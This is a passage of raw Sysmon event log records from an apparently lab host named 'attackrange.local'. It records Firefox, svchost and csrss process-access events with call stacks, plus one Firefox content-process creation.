Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105399Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105398Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a5a8dd|C:\Program Files\Mozilla Firefox\xul.dll+a4fe8a|C:\Program Files\Mozilla Firefox\xul.dll+a4fd44|C:\Program Files\Mozilla Firefox\xul.dll+8ef13e|C:\Program Files\Mozilla Firefox\xul.dll+e48d30|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d 10341000x8000000000000000105397Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+e48ccc|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000105396Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+e48cc1|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8 10341000x8000000000000000105395Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+e48cc1|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8 10341000x8000000000000000105394Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105393Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+e48cc1|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8 10341000x8000000000000000105392Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.136{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+e48cc1|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8 10341000x8000000000000000105391Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.114{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+e48c43|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105390Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.114{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+c2e55|C:\Program Files\Mozilla Firefox\xul.dll+e4891a|C:\Program Files\Mozilla Firefox\xul.dll+362c4d4|C:\Program Files\Mozilla Firefox\xul.dll+362c440|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105389Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.114{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=09BBF92E4D2A9D36E14D91412B44F4E7,SHA256=9790ABB38CECDC09A5C1DE8EA66F089E864A1C9502627A5EB527C998FA828202,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105388Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.098{58E9C193-B422-615A-0602-00000000FC01}55525064C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+a0942f|C:\Program Files\Mozilla Firefox\xul.dll+878864|C:\Program Files\Mozilla Firefox\xul.dll+166d71b|C:\Program Files\Mozilla Firefox\xul.dll+19cd045|C:\Program Files\Mozilla Firefox\xul.dll+13c95|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+13378|C:\Program Files\Mozilla Firefox\xul.dll+9f2211|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105387Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.098{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105386Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.098{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105385Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.098{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105384Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.098{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105383Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.098{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105382Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.098{58E9C193-B422-615A-0602-00000000FC01}55524268C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+2f07d|C:\Program Files\Mozilla Firefox\firefox.exe+2e285|C:\Program Files\Mozilla Firefox\xul.dll+1fd1d9a|C:\Program Files\Mozilla Firefox\xul.dll+a04e9a|C:\Program Files\Mozilla Firefox\xul.dll+a03065|C:\Program Files\Mozilla Firefox\xul.dll+a0a25e|C:\Program Files\Mozilla Firefox\xul.dll+8b1df0|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+2680a|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105381Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.099{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5552.7.275269594\1982806849" -childID 4 -isForBrowser -prefsHandle 2188 -prefMapHandle 3732 -prefsLen 9460 -prefMapSize 235910 -jsInit 1076 285716 -parentBuildID 20210922161155 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 3920 2b097dee338 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92LowMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000105380Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105379Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105378Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105377Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105376Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.083{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program 